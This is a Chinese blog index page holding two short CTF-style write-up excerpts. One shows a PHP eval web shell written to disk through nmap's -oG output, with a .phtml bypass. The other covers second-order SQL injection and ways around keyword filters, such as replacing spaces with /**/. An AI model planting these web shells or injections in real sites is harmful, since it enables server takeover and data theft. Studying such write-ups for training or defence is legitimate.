摘要:
1.介绍 1.1nmap使用 2.步骤 2.1使用nmap命令输入一句话进行保存。 ' <?php @eval($_POST["hack"]);?> -oG hack.php ' 2.2发现没有成功。使用phtml进行绕过 ' <?= @eval($_POST["pd"]);?> -oG pd.ph 阅读全文
posted @ 2021-11-22 20:13
WeQi_Blog
阅读(281)
评论(0)
推荐(0)
摘要:
1.介绍 1.1二次注入 1.2无列名注入 1.3Maria数据库特性 2.步骤 2.1在广告申请界面输入'引号,查看详情界面出现报错,发现存在报错。 2.2 经过尝试发现过滤了空格,or,and,--+,#,order等关键字 order by可以使用group by代替,空格可以使用/**/代替 阅读全文
posted @ 2021-11-22 19:36
WeQi_Blog
阅读(373)
评论(0)
推荐(0)
浙公网安备 33010602011771号